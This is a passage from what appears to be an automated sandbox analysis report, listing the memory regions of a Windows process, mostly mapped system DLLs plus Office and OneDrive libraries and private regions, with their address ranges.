"c:\\windows\\system32\\d3d10_1.dll") Region: id = 437 start_va = 0x7fef9b40000 end_va = 0x7fef9bbffff entry_point = 0x7fef9b40000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 438 start_va = 0x7fef9bc0000 end_va = 0x7fef9bcefff entry_point = 0x7fef9bc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 439 start_va = 0x7fef9bd0000 end_va = 0x7fef9bdbfff entry_point = 0x7fef9bd0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 440 start_va = 0x7fef9be0000 end_va = 0x7fef9c5dfff entry_point = 0x7fef9be0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 441 start_va = 0x7fef9c60000 end_va = 0x7fef9c94fff entry_point = 0x7fef9c60000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 442 start_va = 0x7fef9ca0000 end_va = 0x7fefa521fff entry_point = 0x7fef9ca0000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 443 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 444 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 445 start_va = 0x7fefaa80000 end_va = 0x7fefaa82fff entry_point = 0x7fefaa80000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 446 start_va = 0x7fefaa90000 end_va = 0x7fefaa92fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 447 start_va = 0x7fefaaa0000 end_va = 0x7fefaaa2fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 448 start_va = 0x7fefaab0000 end_va = 0x7fefaab2fff entry_point = 0x7fefaab0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 449 start_va = 0x7fefaac0000 end_va = 0x7fefaac4fff entry_point = 0x7fefaac0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 450 start_va = 0x7fefaad0000 end_va = 0x7fefaad4fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 451 start_va = 0x7fefaae0000 end_va = 0x7fefaae2fff entry_point = 0x7fefaae0000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 452 start_va = 0x7fefaaf0000 end_va = 0x7fefab8bfff entry_point = 0x7fefaaf0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 453 start_va = 0x7fefab90000 end_va = 0x7fefab93fff entry_point = 0x7fefab90000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 454 start_va = 0x7fefaba0000 end_va = 0x7fefaba3fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 455 start_va = 0x7fefabb0000 end_va = 0x7fefabb2fff entry_point = 0x7fefabb0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 456 start_va = 0x7fefabc0000 end_va = 0x7fefabc3fff entry_point = 0x7fefabc0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 457 start_va = 0x7fefabd0000 end_va = 0x7fefabd2fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 458 start_va = 0x7fefabe0000 end_va = 0x7fefabe2fff entry_point = 0x7fefabe0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 459 start_va = 0x7fefabf0000 end_va = 0x7fefabf2fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 460 start_va = 0x7fefac00000 end_va = 0x7fefac02fff entry_point = 0x7fefac00000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 461 start_va = 0x7fefac10000 end_va = 0x7fefac12fff entry_point = 0x7fefac10000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 462 start_va = 0x7fefac20000 end_va = 0x7fefac22fff entry_point = 0x7fefac20000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 463 start_va = 0x7fefac30000 end_va = 0x7fefad21fff entry_point = 0x7fefac30000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 464 start_va = 0x7fefad30000 end_va = 0x7fefad33fff entry_point = 0x7fefad30000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 465 start_va = 0x7fefad40000 end_va = 0x7fefad55fff entry_point = 0x7fefad40000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 466 start_va = 0x7fefad60000 end_va = 0x7fefb075fff entry_point = 0x7fefad60000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 467 start_va = 0x7fefb080000 end_va = 0x7fefb33dfff entry_point = 0x7fefb080000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\amd64\\filesyncshell64.dll") Region: id = 468 start_va = 0x7fefb340000 end_va = 0x7fefb396fff entry_point = 0x7fefb340000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 469 start_va = 0x7fefb3a0000 end_va = 0x7fefb569fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 470 start_va = 0x7fefb570000 end_va = 0x7fefb587fff entry_point = 0x7fefb570000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 471 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 472 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 473 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 474 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 475 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 476 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 477 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 478 start_va = 0x7fefbd80000 end_va = 0x7fefbd94fff entry_point = 0x7fefbd80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 479 start_va = 0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 480 start_va = 0x7fefbdb0000 end_va = 0x7fefbdc5fff entry_point = 0x7fefbdb0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 481 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 482 start_va = 0x7fefbf10000 end_va = 0x7fefc039fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 483 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 484 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 485 start_va = 0x7fefc140000 end_va = 0x7fefc182fff entry_point = 0x7fefc140000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 486 start_va = 0x7fefc190000 end_va = 0x7fefc281fff entry_point = 0x7fefc190000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 487 start_va = 0x7fefc290000 end_va = 0x7fefc4a4fff entry_point = 0x7fefc290000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 488 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 489 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 490 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 491 start_va = 0x7fefcb80000 end_va = 0x7fefcbabfff entry_point = 0x7fefcb80000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 492 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 493 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 494 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 495 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 496 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 497 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 498 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 499 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 500 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 501 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 502 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 503 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 504 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 505 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 506 start_va = 0x7fefd980000 end_va = 0x7fefd9a2fff entry_point = 0x7fefd980000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 507 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 508 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 509 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 510 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 511 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 512 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 513 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 514 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 515 start_va = 0x7fefdd20000 end_va = 0x7fefdd59fff entry_point = 0x7fefdd20000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 516 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 517 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 518 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 519 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 520 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 521 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 522 start_va = 0x7fefed90000 end_va = 0x7fefee26fff entry_point = 0x7fefed90000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 523 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 524 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 525 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 526 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 527 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 528 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 529 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 530 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 531 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 532 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 533 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 534 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 535 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 536 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 537 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 538 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 539 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 540 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 541 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 542 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 543 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 544 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 545 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 546 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 547 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 548 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 549 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 550 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 551 start_va = 0x7fffff70000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 552 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 553 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 